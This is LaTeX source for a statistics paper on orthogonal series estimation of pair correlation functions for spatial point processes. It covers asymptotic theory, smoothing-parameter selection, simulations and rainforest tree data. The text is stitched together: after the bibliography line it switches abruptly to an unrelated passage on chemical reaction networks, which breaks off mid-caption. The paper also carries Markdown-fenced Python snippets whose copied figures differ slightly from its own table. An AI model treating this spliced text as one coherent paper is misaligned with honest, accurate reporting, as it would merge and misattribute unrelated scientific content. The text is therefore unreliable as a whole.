These identities imply that the results regarding consistency and asymptotic normality established for $\hat g_o(r;b)$ in Section~\ref{sec:asympresults} are
also valid for $\tilde g_o(r;b)$.
\section{Consistency and asymptotic normality}\label{sec:asympresults}
\subsection{Setting}
To obtain asymptotic results we assume that $X$ is observed through an increasing sequence of observation windows
$W_n$. For ease of presentation we assume rectangular
observation windows $W_n= \times_{i=1}^d [-n a_i , n a_i]$ for some
$a_i >0$, $i=1,\ldots,d$. More general sequences of windows can be used at the
expense of more notation and assumptions. We also consider an associated sequence
$\psi_n$, $n \ge 1$, of smoothing parameters satisfying conditions to
be detailed in the following. We let $\hat \theta_{k,n}$ and $\hat
g_{o,n}$ denote the estimators of $\theta_k$ and $g$ obtained from
$X$ observed on $W_n$. Thus
\[
\hat \theta_{k,n} = \frac{1}{{\text{sa}_d}|W_n|}
\sum_{\substack{u,v\in X_{W_n}\\ v - u \in B_{r_{\min}}^R}}^{\neq}
\frac{\phi_k(\|v-u\|-{r_{\min}})w(\|v-u\|-{r_{\min}})}{\rho(u) \rho(v) \|v-u\|^{d-1}e_n(v-u)},
\]
where
\begin{equation}\label{eq:edge}
B_{r_{\min}}^R=\{ h \in {\mathbb R}^d \mid {r_{\min}} < \|h\| < {r_{\min}}+R\} \quad \text{and}\quad e_n(h)= |W_n
\cap (W_n)_{h}|/|W_n|.
\end{equation}
Further,
\[
\hat g_{o,n} (r;b) = \sum_{k=1}^{K_n} b_k(\psi_n) \hat \theta_{k,n} \phi_k(r-{r_{\min}})
= \frac{1}{{\text{sa}_d}|W_n|}
\sum_{\substack{u,v\in X_{W_n}\\ v - u \in B_{r_{\min}}^R}}^{\neq}
\frac{w(\|v-u\|-{r_{\min}})\varphi_{n}(v - u,r)}{\rho(u) \rho(v) \|v-u\|^{d-1}e_n(v-u)},
\]
where
\begin{equation}\label{eq:hn}
\varphi_{n}(h,r) = \sum_{k=1}^{K_n} b_k(\psi_n) \phi_k(\|h\|-{r_{\min}}) \phi_k(r-{r_{\min}}).
\end{equation}
In the results below we refer to higher order normalized
joint intensities $g^{(k)}$ of $X$.
Define the $k$'th order joint intensity of $X$ by the identity
\[
E\left\{\sum_{u_1,\ldots,u_k \in X}^{\neq} \mathbbm{1}( u_1 \in A_1,\ldots,u_k \in A_k) \right\}
= \int_{A_1\times \cdots \times A_k} \rho^{(k)}(v_1,\ldots,v_k) {\mathrm{d}} v_1\cdots{\mathrm{d}} v_k
\]
for bounded subsets $A_i \subset {\mathbb R}^d$, $i=1,\ldots,k$, where the
sum is over distinct $u_1,\ldots,u_k$.
We then let $g^{(k)}(v_1,\ldots,v_k)=\rho^{(k)}(v_1,\ldots,v_k)/\{\rho(v_1) \cdots \rho(v_k)\}$ and assume with an abuse of notation that the $g^{(k)}$ are translation invariant for $k=3,4$, i.e.\ $g^{(k)}(v_1,\ldots,v_k)=g^{(k)}(v_2-v_1,\ldots,v_k-v_1)$.
\subsection{Consistency of orthogonal series estimator}
\label{sec:consistency}
Consistency of the orthogonal series estimator can be established under
fairly mild conditions following the approach in \cite{hall:87}.
We first state some conditions that ensure (see Section~S2 of the supplementary
material)
that $\text{var}(\hat \theta_{k,n}) \le C_1/|W_n|$ for some $0<C_1 < \infty$:
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{V\theenumi}
\item \label{cond:rho} There exists $0< \rho_{\min} < \rho_{\max} < \infty$
such that for all $u\in{\mathbb R}^{d}$, $\rho_{\min}\leq \rho(u)\leq \rho_{\max}$.
\item \label{cond:gandg3} For any $h, h_1,h_2\in B_{r_{\min}}^R$,
$g(h) w(\|h\|-{r_{\min}}) \leq C_2 \|h\|^{d-1}$ and $g^{(3)}(h_1,h_2)\leq C_3$
for constants $C_2,C_3 < \infty$.
\item \label{cond:boundedg4integ} A constant $C_4<\infty$ can be
found such that $\sup_{h_1,h_2\in B_{r_{\min}}^R}
\int_{{\mathbb R}^{d}} \Big| g^{(4)}(h_1, h_3,h_2+h_3) - g(h_1)g(h_2)
\Big| {\mathrm{d}} h_3 \leq C_4$.
\end{enumerate}
The first part of V\ref{cond:gandg3} is needed to ensure finite variances of the $\hat \theta_{k,n}$ and is discussed in detail in Section~\ref{sec:varthetak}. The second part simply requires that $g^{(3)}$ is bounded.
The condition V\ref{cond:boundedg4integ} is a weak dependence condition which is also used for asymptotic normality in Section~\ref{sec:asympnorm} and for estimation of $\theta_k^2$ in Section~\ref{sec:miseest}.
Regarding the smoothing scheme, we assume
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{S\theenumi}
\item $B=\sup_{k,\psi} \big|b_k(\psi)\big|< \infty$ and for all $\psi$,
$\sum_{k=1}^\infty \big|b_k(\psi)\big| <\infty$.
\item $\psi_n \rightarrow \psi^*$ for some $\psi^*$, and
$\lim_{\psi \rightarrow \psi^*} \max_{1 \le k \le m} \big|b_k(\psi)-1\big|=0$
for all $m\geq1$.
\item $|W_n|^{-1} \sum_{k=1}^\infty \big| b_k(\psi_n)\big| \rightarrow 0$.
\end{enumerate}
E.g.\ for the simplest smoothing scheme, $\psi_n = K_n$,
$\psi^*=\infty$ and we assume $K_n/|W_n| \rightarrow 0$.
Assuming the above conditions we now verify that the mean integrated
squared error of $\hat g_{o,n}$ tends to zero as $n \rightarrow
\infty$. By \eqref{eq:miseo}, $\textsc{mise}\big(\hat{g}_{o,n}, w \big)/{\text{sa}_d}
= \sum_{k=1}^{\infty} \big[ b_{k}(\psi_n)^2 \text{var}(\hat{\theta}_{k,n})+
\theta_{k}^2\{b_k(\psi_n) - 1\}^2 \big]$.
By V1-V3 and S1 the right hand side is bounded by
\[ B C_1 |W_n|^{-1} \sum_{k=1}^\infty \big| b_k(\psi_n)\big| + \max_{1 \le k \le
m}\theta_k^2 \sum_{k=1}^m (b_k(\psi_n)-1)^2 + (B^2+1) \sum_{k=m+1}^\infty
\theta_k^2.
\]
By Parseval's identity, $\sum_{k=1}^{\infty} \theta_k^2 < \infty$.
The last term can thus be made arbitrarily small by choosing $m$
large enough. It also follows that $\theta_k^2$ tends to zero as $k \rightarrow \infty$.
Hence, by S2, the middle term
can be made arbitrarily small by choosing $n$ large enough for any choice of $m$. Finally, the first term can be made arbitrarily small by S3 and choosing $n$ large enough.
\subsection{Asymptotic normality}\label{sec:asympnorm}
The estimators $\hat \theta_{k,n}$ as well as the estimator $\hat g_{o,n}(r;b)$
are of the form
\begin{equation}\label{eq:decomp2}
S_n = \frac{1}{{\text{sa}_d} |W_n|} \sum_{\substack{u,v\in X_{W_n}\\ v-u \in B_{r_{\min}}^R}}^{\neq}
\frac{f_n(v-u)}{\rho(u)\rho(v)e_n(v-u)}
\end{equation}
for a sequence of even functions $f_n:{\mathbb R}^d \rightarrow
{\mathbb R}$. We let $\tau^2_n=|W_n|\text{var}(S_n)$.
To establish asymptotic normality of estimators of the form
\eqref{eq:decomp2} we need certain mixing
properties for $X$ as in \cite{waagepetersen:guan:09}. The strong mixing coefficient for the point process $X$
on ${\mathbb R}^d$ is given by~\citep{ivanoff:82,politis:paparoditis:romano:98}
\begin{align*}
\alpha_{\mathbf{X}}(m;a_1,a_2) =
\sup\big\{& \big| \text{pr}(E_1\cap E_2) - \text{pr}(E_1)\text{pr}(E_2) \big|:
E_1\in\mathcal{F}_{X}(B_1), E_2\in\mathcal{F}_{X}(B_2), \\
&|B_1|\leq a_1, |B_2|\leq a_2,
\mathcal{D}(B_1, B_2)\geq m, B_1,B_2\in\mathcal{B}({\mathbb R}^d) \big\},
\end{align*}
where $\mathcal{B}({\mathbb R}^d)$ denotes the Borel $\sigma$-field on ${\mathbb R}^d$,
$\mathcal{F}_{X}(B_i)$
is the $\sigma$-field generated by $X\cap B_i$ and
\[
\mathcal{D}(B_1, B_2) = \inf\big\{\max_{1\leq i\leq d}|u_i-v_i|:
u=(u_1,\ldots,u_d)\in B_1, v=(v_1,\ldots,v_d)\in B_2 \big\}.
\]
To verify asymptotic normality we need the following assumptions as well as V1 (the conditions V2 and V3 are not needed due to conditions N\ref{cond:boundedgfuns} and N\ref{cond:unifbound} below):
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{N\theenumi}
\item \label{cond:mixingcoef}
The
mixing coefficient satisfies $\alpha_{X}(m;(s+2R)^d,\infty) =
O(m^{-d-\varepsilon})$ for some $s,\varepsilon>0$.
\item \label{cond:boundedgfuns}
There exist $\eta>0$ and $L_{1}<\infty$
such that $g^{(k)}(h_1,\ldots,h_{k-1})\leq L_{1}$ for $k=2,\ldots,
2(2+\lceil \eta \rceil )$ and all $h_1,\ldots,h_{k-1}\in{\mathbb R}^{d}$.
\item \label{cond:liminfvar}
$\liminf_{n \rightarrow \infty} \tau^2_n >0$.
\item \label{cond:unifbound}
There exists $L_2 < \infty$ such that
$| f_n(h) | \le L_2$ for all $n \ge 1$ and $h \in B_{r_{\min}}^R$.
\end{enumerate}
The conditions N1-N\ref{cond:liminfvar} are standard in the point process
literature, see e.g.\ the discussions in \cite{waagepetersen:guan:09}
and \cite{coeurjolly:moeller:14}.
The condition N\ref{cond:liminfvar} is difficult to verify and is usually
left as an assumption, see \cite{waagepetersen:guan:09},
\cite{coeurjolly:moeller:14} and \cite{dvovrak:prokevov:16}.
However, at least in the stationary case, and in case
of estimation of $\hat \theta_{k,n}$, the expression
for $\text{var}(\hat \theta_{k,n})$ in Section~S2 of the supplementary
material
shows that $\tau_n^2=|W_n| \text{var}(\hat \theta_{k,n})$ converges to
a constant which supports the plausibility of condition N\ref{cond:liminfvar}.
We discuss N\ref{cond:unifbound} in further detail
below when applying the general framework to $\hat \theta_{k,n}$ and
$\hat g_{o,n}$.
The following theorem is proved in Section~S3 of the supplementary
material.
\begin{theorem}\label{theo:coefnormality}
Under conditions V1, N1-N4,
$\tau_{n}^{-1} |W_n|^{1/2} \big\{ S_n - E(S_n) \big\} \stackrel{D}{\longrightarrow} N(0, 1)$.
\end{theorem}
\subsection{Application to $\hat \theta_{k,n}$ and $\hat g_{o,n}$}
In case of estimation of $\theta_{k}$, $\hat{\theta}_{k,n}=S_n$ with
$f_n(h)= \phi_k(\|h\|-{r_{\min}})w(\|h\|-{r_{\min}})/\|h\|^{d-1}$.
The assumption N\ref{cond:unifbound} is then straightforwardly
seen to hold in the case of the Fourier-Bessel
basis where $|\phi_k(r)|\le |\phi_k(0)|$ and $w(r)=r^{d-1}$. For the
cosine basis, N\ref{cond:unifbound} does not hold in general and further assumptions are needed, cf.\ the discussion in Section~\ref{sec:varthetak}. For simplicity we here just assume ${r_{\min}}>0$.
Thus we state the following.
\begin{corollary}
Assume V1, N1-N4, and, in case of the cosine basis, that ${r_{\min}}>0$. Then
\[
\{\text{var}(\hat \theta_{k,n})\}^{-1/2} (\hat \theta_{k,n} -\theta_{k}) \stackrel{D}{\longrightarrow} N(0, 1). \]
\end{corollary}
For $\hat g_{o,n}(r;b)=S_n$,
\[
f_n(h)=\frac{\varphi_n(h,r) w(\|h\|-{r_{\min}})}{\|h\|^{d-1}}
= \frac{w(\|h\|-{r_{\min}})}{\|h\|^{d-1}}
\sum_{k=1}^{K_n} b_k(\psi_n) \phi_k(\|h\|-{r_{\min}}) \phi_k(r-{r_{\min}}),
\]
where $\varphi_n$ is defined in \eqref{eq:hn}.
In this case, $f_n$ is typically not uniformly bounded since the
number of terms in the sum defining $\varphi_n$ in \eqref{eq:hn}
grows with $n$ and the terms are not necessarily decreasing. We therefore
introduce one more condition:
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{N\theenumi}
\setcounter{enumi}{4}
\item \label{cond:Knbound} There exist $\omega>0$ and $M_\omega<\infty$ so that
\[ K_{n}^{-\omega} \sum_{k=1}^{K_n}
b_k(\psi_n)\big|\phi_k(r-{r_{\min}})\phi_k(\|h\|-{r_{\min}}) \big| \leq M_{\omega} \]
for all $h\in B_{r_{\min}}^R$.
\end{enumerate}
Given N\ref{cond:Knbound}, we can simply rescale: $\tilde{S}_n:= K_n^{-\omega} S_n$
and $\tilde \tau^2_n:=K_n^{-2\omega} \tau^2_n$.
Then, assuming $\liminf_{n \rightarrow \infty} \tilde \tau_n^2 >0$,
Theorem~\ref{theo:coefnormality} gives the asymptotic normality of
$\tilde \tau_n^{-1}|W_n|^{1/2} \{\tilde{S}_n- E(\tilde{S}_n)\}$
which is equal to $\tau_n^{-1}|W_n|^{1/2}\{S_n- E(S_n)\}$.
Hence we obtain
\begin{corollary}
Assume V\ref{cond:rho},
N\ref{cond:mixingcoef}-N\ref{cond:boundedgfuns}, N\ref{cond:Knbound} and
$\liminf_{n \rightarrow \infty} K_n^{-2\omega} \tau_n^2>0$.
In case of the cosine basis, assume further ${r_{\min}}>0$.
Then for $r\in({r_{\min}},{r_{\min}}+R)$,
\[
\tau_n^{-1}|W_n|^{1/2} \big[ \hat{g}_{o,n}(r;b)- E\{\hat g_{o,n}(r;b)\} \big] \stackrel{D}{\longrightarrow} N(0, 1).
\]
\end{corollary}
In case of the simple smoothing scheme $b_k(\psi_n)=\mathbbm{1}(k \le K_n)$,
we take $\omega=1$ for the cosine basis. For the
Fourier-Bessel basis we take $\omega=4/3$ when $d=1$ and
$\omega=d/2+2/3$ when $d>1$ (see the derivations in Section~S6 of the
supplementary material).
\section{Tuning the smoothing scheme}\label{sec:miseest}
In practice we choose $K$, and other parameters in
the smoothing scheme $b(\psi)$, by minimizing an estimate of the
mean integrated squared error.
This is equivalent to minimizing
\begin{equation} \label{eq:Ipsi} {\text{sa}_d} I(\psi) = \textsc{mise}(\hat g_{o}, w)
- \int_{{r_{\min}}}^{{r_{\min}}+R} \big\{ g(r) - 1 \big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r =
\sum_{k=1}^{K} \big[ b_{k}(\psi)^2 E\{(\hat{\theta}_{k})^2\}
-2b_k(\psi) \theta_{k}^2 \big].
\end{equation}
In practice we must replace \eqref{eq:Ipsi} by an
estimate. Define $\widehat{\theta^2_k}$ as
\[ \sum_{\substack{u,v,u',v' \in X_W\\ v-u,\,v'-u' \in B_{r_{\min}}^R }}^{\neq}
\frac{\phi_k(\|v-u\|-{r_{\min}})\phi_k(\|v'-u'\|-{r_{\min}})w(\|v-u\|-{r_{\min}})w(\|v'-u'\|-{r_{\min}})}{{\text{sa}_d}^2
\rho(u)\rho(v)\rho(u')\rho(v')
\|v-u\|^{d-1} \|v'-u'\|^{d-1} |W \cap W_{v-u}| | W \cap W_{v'-u'}|}.
\]
Then, referring to the set-up in Section~\ref{sec:asympresults} and assuming V\ref{cond:boundedg4integ},
\[
\lim_{n \rightarrow \infty} E(\widehat{\theta^2_{k,n}}) =
\left\{\int_{0}^{R} g(r+{r_{\min}}) \phi_k(r) w(r) {\mathrm{d}} r \right\}^2
=\theta_k^2
\]
(see Section~S4 of the supplementary material)
and hence
$\widehat{\theta^2_{k,n}}$
is an asymptotically unbiased estimator of $\theta_{k}^2$. The
estimator is obtained from $(\hat \theta_k)^2$ by retaining only terms
where all four points $u,v,u',v'$ involved are
distinct. In simulation studies, $\widehat{\theta_k^2}$ had a smaller root mean squared error than $(\hat \theta_k)^2$ for estimation of $\theta_k^2$.
Thus
\begin{equation}\label{eq:Ipsiestm}
\hat I(\psi) = \sum_{k=1}^{K}
\big\{ b_{k}(\psi)^2 (\hat{\theta}_{k})^2
-2 b_k(\psi) \widehat{\theta_{k}^2} \big\}
\end{equation}
is an asymptotically unbiased estimator of~\eqref{eq:Ipsi}. Moreover, \eqref{eq:Ipsiestm} is equivalent to the following slight modification of
\cite{guan:leastsq:07}'s criterion \eqref{eq:ywcv}:
\[
\int_{{r_{\min}}}^{{r_{\min}}+R} \big\{ \hat{g}_{o}(r;b) \big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r
-\frac{2}{{\text{sa}_d}} \sum_{\substack{u,v\in X_{W}\\ v-u\in B_{r_{\min}}^R}}^{\neq}
\frac{\hat{g}_{o}^{-\{u,v\}}(\|v-u\|;b)w(\|v-u\|-{r_{\min}})}{
\rho(u) \rho(v)|W \cap W_{v-u}|}.
\]
For the simple smoothing scheme $b_k(K)=\mathbbm{1}(k\leq K)$, \eqref{eq:Ipsiestm}
reduces to
\begin{equation}\label{eq:Isimple}
\hat I(K) = \sum_{k=1}^{K}
\big\{ (\hat{\theta}_{k})^2 -2 \widehat{\theta_{k}^2} \big\}
= \sum_{k=1}^{K} (\hat{\theta}_{k})^2 ( 1 -2 \hat{b}^{*}_{k}),
\end{equation}
where $\hat{b}^{*}_{k}=\widehat{\theta_{k}^2}/(\hat{\theta}_{k})^2$ is
an estimator of $b^{*}_{k}$ in~\eqref{eq:bstar}.
In practice, uncertainties
of $\hat \theta_{k}$ and $\widehat{\theta_{k}^{2}}$
lead to numerical instabilities in the minimization of~\eqref{eq:Ipsiestm}
with respect to $\psi$. To obtain a numerically stable procedure we first determine $K$ as
\begin{equation}\label{eq:Kestim}
\hat K = \inf \{2 \le k \le K_{\max}: (\hat{\theta}_{k+1})^2
-2 \widehat{\theta_{k+1}^2} > 0 \}
= \inf \{2 \le k \le K_{\max}: \hat{b}^{*}_{k+1} < 1/2 \}.
\end{equation}
That is, $\hat K$ is the first local minimum of \eqref{eq:Isimple}
larger than 1 and smaller than an upper limit $K_{\max}$ which we chose to be
49 in the applications. This choice of $K$ is also used for the refined and the Wahba smoothing schemes.
For the refined smoothing scheme we thus let $b_{k}=\mathbbm{1}(k\leq \hat K)\hat{b}_{k}^{*}$. For the Wahba smoothing
scheme $b_{k}=\mathbbm{1}(k\leq \hat K)/(1 + \hat c_1k^{\hat c_2})$, where $\hat c_1$ and $\hat c_2$ minimize $ \sum_{k=1}^{\hat K}
\left\{ (\hat{\theta}_{k})^2/(1 + c_1k^{c_2})^2 -
2 \widehat{\theta_{k}^2}/(1 + c_1k^{c_2}) \right\}$
over $c_1>0$ and $c_2>1$.
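The selection rule \eqref{eq:Kestim} amounts to scanning the coefficient index until the unbiased risk estimate would start to increase, i.e.\ until $\hat b^*_{k+1}<1/2$. A minimal sketch (ours; the zero-based array layout is our convention, with position $i$ holding coefficient $k=i+1$):

```python
def select_K(th2_point, th2_unbiased, K_max=49):
    """First-local-minimum rule: the smallest k in {2, ..., K_max} with
    (theta_hat_{k+1})^2 - 2 * hat(theta^2)_{k+1} > 0, i.e. b*_{k+1} < 1/2.
    th2_point[i]  = (theta_hat_{i+1})^2   (plug-in square),
    th2_unbiased[i] = hat(theta^2)_{i+1}  (asymptotically unbiased estimate)."""
    for k in range(2, K_max + 1):
        # coefficient k + 1 sits at zero-based index k
        if th2_point[k] - 2.0 * th2_unbiased[k] > 0.0:
            return k
    return K_max
```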
\section{Simulation study}
\label{sec:simstudy}
\begin{figure}
\centering
\includegraphics[width=\textwidth]{gfuns.pdf}
\caption{Pair correlation functions for the point processes considered in the simulation study.}
\label{fig:gfuns}
\end{figure}
We compare the performance of the orthogonal series estimators and
the kernel estimators for data simulated on $W=[0,1]^2$ or
$W=[0,2]^2$ from four point processes with constant intensity $\rho=100$.
More specifically, we consider $n_{\text{sim}}=1000$ realizations from a Poisson process,
a Thomas process (parent intensity $\kappa=25$, dispersion standard deviation $\omega=0.0198$),
a Variance Gamma cluster process \citep[parent intensity
$\kappa=25$, shape parameter $\nu=-1/4$, dispersion parameter $\omega=0.01845$,][]{jalilian:guan:waagepetersen:13}, and a determinantal point process
with pair correlation function $g(r)=1-\exp\{-2 (r/\alpha)^2\}$
and $\alpha=0.056$. The pair correlation functions of these point processes are shown in Figure~\ref{fig:gfuns}.
For each realization,
$g(r)$ is estimated for $r$ in $({r_{\min}}, {r_{\min}}+ R)$, with ${r_{\min}}=10^{-3}$ and $R=0.06, 0.085, 0.125$,
using the kernel estimators $\hat{g}_{k}(r; b)$, $\hat{g}_{d}(r; b)$ and
$\hat{g}_{c}(r; b)$ or the orthogonal series estimator $\hat{g}_{o}(r;b)$.
The Epanechnikov kernel with bandwidth $b=0.15/\surd{\hat{\rho}}$
is used for $\hat{g}_{k}(r; b)$
and $\hat{g}_{d}(r; b)$ while the bandwidth of $\hat{g}_{c}(r; b)$
is chosen by minimizing \cite{guan:leastsq:07}'s estimate \eqref{eq:ywcv} of
the mean integrated squared error.
For the orthogonal series estimator, we consider both the cosine and the Fourier-Bessel
bases with simple, refined or Wahba smoothing schemes.
For the Fourier-Bessel basis we use the modified orthogonal series
estimator described in Section~\ref{sec:g-1}. The parameters for the smoothing
scheme are chosen according to Section~\ref{sec:miseest}.
From the simulations we estimate the mean integrated squared error \eqref{eq:mise} with $w(r)=1$ of each estimator $\hat g_m$, $m=k,d,c,o$,
over the intervals $[{r_{\min}}, 0.025]$ (small spatial lags) and
$[{r_{\min}}, {r_{\min}}+R]$ (all lags).
We consider the kernel estimator $\hat{g}_{k}$
as the baseline estimator and compare any of the other estimators $\hat g$
with $\hat{g}_{k}$ using the log relative efficiency
$e_{I}(\hat{g}) = \log \{ \widehat{\textsc{mise}}_{I}(\hat{g}_{k})/\widehat{\textsc{mise}}_{I}(\hat{g}) \}$, where $\widehat{\textsc{mise}}_{I}(\hat{g})$ denotes the estimated mean squared integrated error over the interval $I$ for the estimator $\hat{g}$. Thus
$e_{I}(\hat{g}) > 0$ indicates that $\hat{g}$ outperforms
$\hat{g}_{k}$ on the interval $I$.
Results for $W=[0,1]^2$ are summarized in Figure~\ref{fig:efficiencies}.
\begin{figure}
\centering
\begin{tabular}{cc}
\includegraphics[width=\textwidth]{plot11new.pdf}
\end{tabular}
\caption{Plots of log relative efficiencies for small lags $({r_{\min}},
0.025]$ and all lags $({r_{\min}}, {r_{\min}}+R]$, $R=0.06,0.085,0.125$, and $W=[0,1]^2$. Black: kernel estimators. Blue and red: orthogonal series estimators with the Fourier-Bessel and cosine bases, respectively. Lines serve to ease visual interpretation.}\label{fig:efficiencies}
\end{figure}
For all types of point processes, the orthogonal series estimators
outperform or do as well as the kernel estimators, both at small lags
and over all lags. The detailed conclusions depend on whether the non-repulsive Poisson, Thomas and Var Gamma processes or the repulsive determinantal process is considered. Orthogonal-Bessel with refined or Wahba smoothing is superior for Poisson, Thomas and Var Gamma but only better than $\hat g_c$ for the determinantal point process. The performance of the orthogonal-cosine estimator lies between or above that of the kernel estimators for Poisson, Thomas and Var Gamma, and matches the best kernel estimator for determinantal. Regarding the kernel estimators, $\hat g_c$ is better than $\hat g_d$ for Poisson, Thomas and Var Gamma and worse than $\hat g_d$ for determinantal.
The above conclusions are stable over the three $R$ values
considered. For $W=[0,2]^2$ (see Figure~S1 in the supplementary
material) the conclusions are similar but with a clearer superiority of the orthogonal series
estimators for Poisson and Thomas. For Var Gamma the performance of
$\hat g_c$ is similar to the orthogonal series estimators. For determinantal and
$W=[0,2]^2$, $\hat g_c$ is better than
orthogonal-Bessel-refined/Wahba but still inferior to
orthogonal-Bessel-simple and orthogonal-cosine.
Figures~S2 and S3 in the supplementary material give more
detailed insight into the bias and variance properties of $\hat g_k$,
$\hat g_c$, and the orthogonal series estimators with simple smoothing scheme.
Table~S1 in the supplementary material shows that the selected $K$ in
general increases when the observation window is enlarged, as
required for the asymptotic results. The general
conclusion, taking into account the simulation results for all four
types of point processes, is that the best
overall performance is obtained with orthogonal-Bessel-simple, orthogonal-cosine-refined or orthogonal-cosine-Wahba.
To supplement our theoretical results in Section~\ref{sec:asympresults}
we consider the distribution of the simulated $\hat g_o(r;b)$ for $r=0.025$
and $r=0.1$ in case of the Thomas process and using the Fourier-Bessel
basis with the simple smoothing scheme. In addition to $W=[0,1]^2$ and
$W=[0,2]^2$, also $W=[0,3]^2$ is considered. The mean, standard error,
skewness and kurtosis of $\hat{g}_{o}(r)$ are given in Table~\ref{tab:fsampleghat}
while histograms of the estimates are shown in Figure~S3.
The standard error of $\hat g_{o}(r;b)$ scales as $|W|^{-1/2}$,
in accordance with our theoretical results. The bias also decreases and
the distributions of the estimates become increasingly normal as $|W|$ increases.
\begin{table}
\caption{Monte Carlo mean, standard error, skewness (S)
and kurtosis (K) of $\hat{g}_{o}(r)$ using the Bessel basis
with the simple smoothing scheme in case of the Thomas process on observation
windows $W_1=[0,1]^2$, $W_2=[0,2]^2$ and $W_3=[0,3]^2$.}%
\begin{tabular}{ccccccc}
& $r$ & $g(r)$ & $\hat{E}\{\hat{g}_{o}(r)\}$ & $[\hat{\text{var}}\{\hat{g}_{o}(r)\}]^{1/2}$
& $\hat{\text{S}}\{\hat{g}_{o}(r)\}$ & $\hat{\text{K}}\{\hat{g}_{o}(r)\}$ \\
$W_1$ & 0.025 & 3.972 & 3.961 & 0.923 & 1.145 & 5.240 \\
$W_1$ & 0.1 & 1.219 & 1.152 & 0.306 & 0.526 & 3.516 \\
$W_2$ & 0.025 & 3.972 & 3.959 & 0.467 & 0.719 & 4.220 \\
$W_2$ & 0.1 & 1.219 & 1.187 & 0.150 & 0.691 & 4.582 \\
$W_3$ & 0.025 & 3.972 & 3.949 & 0.306 & 0.432 & 3.225 \\
$W_3$ & 0.1 & 1.219 & 1.202 & 0.095 & 0.291 & 2.957
\end{tabular}
\label{tab:fsampleghat}
\end{table}
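The claimed scaling can be checked directly against the standard errors reported in Table~\ref{tab:fsampleghat}: with $|W_1|, |W_2|, |W_3| = 1, 4, 9$, the ratios of standard errors relative to $W_1$ should be close to $\surd{|W_k|}$. The quick consistency check below is ours, not part of the paper.

```python
import math

# Monte Carlo standard errors of ghat_o(r), copied from Table 1,
# keyed by (window area |W|, lag r).
se = {
    (1, 0.025): 0.923, (1, 0.1): 0.306,
    (4, 0.025): 0.467, (4, 0.1): 0.150,
    (9, 0.025): 0.306, (9, 0.1): 0.0951,
}

# If se(r) ~ c(r) |W|^{-1/2}, then se(W_1)/se(W_k) should equal sqrt(|W_k|).
rel_err = []
for r in (0.025, 0.1):
    for area in (4, 9):
        ratio = se[(1, r)] / se[(area, r)]
        rel_err.append(abs(ratio / math.sqrt(area) - 1.0))

print(max(rel_err))   # every ratio matches sqrt(|W|) to within about 8%
```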
\section{Application}
\label{sec:example}
We consider point patterns of locations of \emph{Acalypha diversifolia}
(528 trees), \emph{Lonchocarpus heptaphyllus} (836 trees) and
\emph{Capparis frondosa} (3299 trees) species in the 1995 census for
the $1000\text{m}\times 500\text{m}$ Barro Colorado Island plot \citep{hubbell:foster:83,condit:98}.
To estimate the intensity function of each species, we use a log-linear regression model
depending on soil condition (contents of copper,
mineralized nitrogen, potassium and phosphorus and soil acidity) and topographical
(elevation, slope gradient, multiresolution
index of valley bottom flatness, incoming mean solar radiation
and the topographic wetness index) variables. The regression parameters
are estimated using the quasi-likelihood approach
in~\cite{guan:jalilian:waagepetersen:15}. The point patterns and fitted intensity functions are shown in Figure~S5 in the supplementary material.
The pair correlation function of each species is then estimated using
the bias corrected kernel estimator $\hat{g}_{c}(r;b)$ with $b$ determined by minimizing~\eqref{eq:ywcv} and the orthogonal series estimator
$\hat{g}_{o}(r;b)$ with both Fourier-Bessel and cosine basis,
refined smoothing scheme and the optimal cut-offs $\hat{K}$ obtained from~\eqref{eq:Kestim};
see Figure~\ref{fig:bcipcfs}.
For {\em Lonchocarpus} the three estimates are
quite similar while for {\em Acalypha} and {\em Capparis} the estimates deviate markedly
for small lags and then become similar for lags
greater than respectively 2 and 8 meters. For {\em Capparis} and the
cosine basis, the number of selected coefficients coincides with the chosen upper limit 49 for the number of coefficients. The cosine estimate displays oscillations which appear to be artefacts of
using high frequency components of the cosine basis. The function
\eqref{eq:Isimple} decreases very slowly after $K=7$ so we also tried
the cosine estimate with $K=7$ which gives a more reasonable
estimate.
\begin{figure}
\centering
\includegraphics[width=0.33\textwidth]{acapcfest.pdf}%
\includegraphics[width=0.33\textwidth]{loncopcfest.pdf}%
\includegraphics[width=0.33\textwidth]{capppcfest.pdf}
\caption{Estimated pair correlation functions for tropical rain forest
trees.}
\label{fig:bcipcfs}
\end{figure}
\section*{Acknowledgement}
Rasmus Waagepetersen is supported by the Danish Council for Independent Research | Natural Sciences, grant ``Mathematical and Statistical Analysis of Spatial Data'', and by the ``Centre for Stochastic Geometry and Advanced Bioimaging'', funded by the Villum Foundation.
\section*{Supplementary material}
Supplementary material
includes proofs of consistency and asymptotic normality results
and details of the simulation study and data analysis.
\bibliographystyle{apalike}
In what follows, we develop a convenient formalism for describing CRN's,
by combining a network decomposition
made standard by CRN-theory \cite{Feinberg:notes:79,Gunawardena:CRN_for_bio:03}
with the well-known stochastic process formalism due to Doi \cite{Doi:SecQuant:76}. To our knowledge, no one has combined these two methods earlier.
The description of CRN's simplifies considerably within this framework. In
addition this formalism is crucial to understanding why the equations
for the FM have the structure they do.
We hence utilize two simple examples of CRN's with non-zero deficiency, to explain both the formalism and our results.
We also provide a definition for the very important concept of deficiency.
\subsection{Two examples}
Our first example is the following minimal model
with just one species and $\delta=1$,
\begin{figure}[ht]
\begin{center}
\includegraphics[scale=0.6]{g_123_conn_labeled.eps}
\caption{A compact graphical representation for a CRN: The red filled circle
with label
${\rm A}$ represents the {\em species} ${\rm A}$
while each open circle represents a {\em complex},
such
as $2 {\rm A}$. The number of solid lines connecting each species to
each complex, represents the {\it stoichiometry} of the complex.
Each dashed line connecting two complexes represents a
\textit{reaction}.
\label{fig:g_123_conn}
}
\end{center}
\end{figure}
Its reaction scheme is
\begin{align}
{\rm A}
& \xrightleftharpoons[\epsilon]{\alpha}
2 {\rm A} \xrightleftharpoons[\beta]{\epsilon}
3 {\rm A}
\label{eq:A_AA_AAA_R_scheme}
\end{align}
Another example is the following CRN with two species
and $\delta=2$:
\begin{figure}[ht]
\begin{center}
\includegraphics[scale=0.6]{two_species_bistable_labeled.eps}
\caption{
%
A CRN involving two species ${\rm A}$ and ${\rm B}$.
The complex with no solid lines
attached to it is the null node $\varnothing$.
